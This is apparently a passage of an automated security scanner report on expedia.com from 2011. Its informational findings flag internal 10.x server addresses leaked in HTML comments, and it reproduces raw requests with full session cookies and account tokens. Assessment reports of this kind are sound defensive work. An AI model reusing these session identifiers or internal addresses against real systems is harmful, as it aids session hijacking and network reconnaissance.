Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:35:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: jscript=1; Domain=.expedia.com; path=/
Set-Cookie: s1=`user=v.8,0,EX01235ACD77$E5$B5201000D$27$E96!G0.!5010$2302!50$ED$A3$27$0C7$85$FE$36!4$FF!e02000`95; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01F1458A8B$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ek$16$E4$24p$5B$39$89$91H`104; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 43196


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.140, Req=15:35:50(:334), Rsp=15:35:50(:397), hash=11(0x157d5588) ET=63ms Dur=63ms Mif=0 -->
...[SNIP]...
28.41. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=litn&&chms=114164&rfrr=-54397&zz=1304739862204 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`user=v.8,0,EX019BC74F84p$B7202000$84$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$94$FF$C5o$B2$E2$9D$21$D6$EF$B2u!e02000`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`383; p1=`gacct=v.1,1,215819496`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`99

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:47:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`0`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`user=v.8,0,EX01D200D71Dp$B7203000$9C$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$D05$F4$B1$D3l$C8!2$D6$EF$B2u!e02000`380; Domain=.expedia.com; path=/
Set-Cookie: p1=`gacct=v.1,1,215819496`tpid=v.1,1`group=v.1,0`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`adinf=v.1,215819507|999|1|15D0EF0FB52C|||`141; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 43188


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.178, Req=15:47:04(:466), Rsp=15:47:04(:497), hash=11(0x157d5588) ET=32ms Dur=32ms Mif=22841772070 -->
...[SNIP]...
28.42. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104; srvys=v.1%2C2%2C0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:36:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01FC4C06DD$F4$B5202000B$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$3A!2$0B$84$DFF$D5$9D$82$AB$89$FB!e02000`132; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 107839

<!-- srvpush1 15:36:07(:810) -->
<style type="text/css">

.intchk {width: 100%; font-size: 16px; font-weight: bold; color:#C60;}
.intchk ul{list-style-type: none; padding: 0; margin-left: 1em;}
.
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.133, Req=15:36:07(:795), Rsp=15:36:08(:232), hash=11(0x157d5588) ET=438ms Dur=438ms Mif=0 -->
...[SNIP]...
28.43. http://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/answers/list/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX01736AF322$F4$B5203000j$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$0C$DB$DA$AB$A8$CA$C8$8A$82$AB$89$FB!e02000`135; Domain=.expedia.com; path=/
Content-Length: 43132


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.142, Req=15:40:45(:978), Rsp=15:40:46(:009), hash=11(0x157d5588) ET=32ms Dur=32ms Mif=0 -->
...[SNIP]...
28.44. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=litn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:58 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97895


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.178, Req=15:44:58(:046), Rsp=15:44:58(:202), hash=11(0x157d5588) ET=157ms Dur=157ms Mif=0 -->
...[SNIP]...
28.45. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304739644741 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`user=v.8,0,EX01CC562A07$F4$B5203000g$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50K$A9$11$90$F1$8C$A5$D1$82$AB$89$FB!e02000`133

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:40:52 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0183E3F010$F4$B5204000k$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$83$A7rJ$D3$B5$CD3$82$AB$89$FB!e02000`129; Domain=.expedia.com; path=/
Set-Cookie: p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`airp=v.1,AUS`gacct=v.1,1,215819496`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`188; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.127, Req=15:40:51(:871), Rsp=15:40:52(:027), hash=11(0x157d5588) ET=157ms Dur=157ms Mif=0 -->
...[SNIP]...
28.46. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=logi&ussl=1&subl=0&lmde=256&selc=3&rfrr=-54397&zz=1304739868950 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=litn&&chms=114164&rfrr=-54397&zz=1304739862204
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; s1=`0`minfo=v.5,EX01068F4DDA$F0$24$DD$0C$3E$0C$2F$1E$C5mR$39$18$13mj$26X$82$16u$F6$EC$5F$9E$C2$5C$C2$27$34$5B$7D$FC$35$F4$0D$2C$8E$21E6L$A4RS$B1$CF9`accttype=v.2,8,1,EX01191EC1D2$F0$24$DD$0C$23$0C$37$1E$CDmZ$39$19$14m$60$26X$83$17$7C$F4$DE$5F$9E`user=v.8,0,EX01CED44CE7p$B7203000$8B$27$E96$B8$60$9D$0D$B8$60$9D$0D$B8$60$9D$0D10001000$1E810$2302!50$9F9o$98X!2$3F$BC$D6$EF$B2u!e02000`378; p1=`gacct=v.1,1,215819496`tpid=v.1,1`group=v.1,0`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`adinf=v.1,215819505|999|1|874F787A276C|||`141

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:47:16 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97417


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.167, Req=15:47:16(:397), Rsp=15:47:16(:538), hash=11(0x157d5588) ET=140ms Dur=140ms Mif=22841772070 -->
...[SNIP]...
28.47. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dinfo%26&ussl=&uact=4&slgn=&zz=1304739350075 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=info
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:48 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97895


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.146, Req=15:44:49(:022), Rsp=15:44:49(:163), hash=11(0x157d5588) ET=140ms Dur=140ms Mif=0 -->
...[SNIP]...
28.48. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=logi&ussl=1&&zz=1304739356206 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=logi&ussl=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
